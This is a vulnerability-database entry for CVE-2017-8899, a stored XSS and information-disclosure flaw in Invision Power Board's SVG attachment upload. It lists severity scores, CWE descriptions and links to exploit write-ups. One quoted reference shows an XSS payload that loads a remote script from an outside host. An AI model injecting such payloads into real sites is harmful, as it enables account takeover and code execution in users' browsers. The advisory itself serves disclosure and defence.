Vulnerability Details : CVE-2017-8899
Potential exploit
Invision Power Services (IPS) Community Suite 4.1.19.2 and earlier has a composite of Stored XSS and Information Disclosure issues in the attachments feature found in User CP. This can be triggered by any Invision Power Board user and can be used to gain access to moderator/admin accounts. The primary cause is the ability to upload an SVG document with a crafted attribute such an onload; however, full path disclosure is required for exploitation.
Vulnerability category: Cross site scripting (XSS)Information leak
Products affected by CVE-2017-8899
- cpe:2.3:a:invisioncommunity:invision_power_board:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2017-8899
0.61%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 78 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2017-8899
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
6.8
|
MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
8.6
|
6.4
|
NIST | |
8.1
|
HIGH | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
2.2
|
5.9
|
NIST |
CWE ids for CVE-2017-8899
-
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.Assigned by: nvd@nist.gov (Primary)
-
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.Assigned by: nvd@nist.gov (Primary)
References for CVE-2017-8899
-
https://twitter.com/sxcurity/status/862284967715381248
Corben Leo on Twitter: "Payload could be something like this: <script src=//sxcurity.pro/pocs/p.js></script>… "Exploit;Third Party Advisory
-
https://twitter.com/insecurity/status/862154908895780864
PROJECT INSECURITY on Twitter: "[EXPLOIT] IPB Forum (4x: Current) - Reflected/Stored XSS + CSRF + FPD + Malicious file upload + ACP->Shell writeup: https://t.co/5XEw98fIVk… https://t.co/RqpG6zDfzW"Exploit;Third Party Advisory
-
http://zeroday.insecurity.zone/exploits/ipb_owned.txt
Exploit;Third Party Advisory
Jump to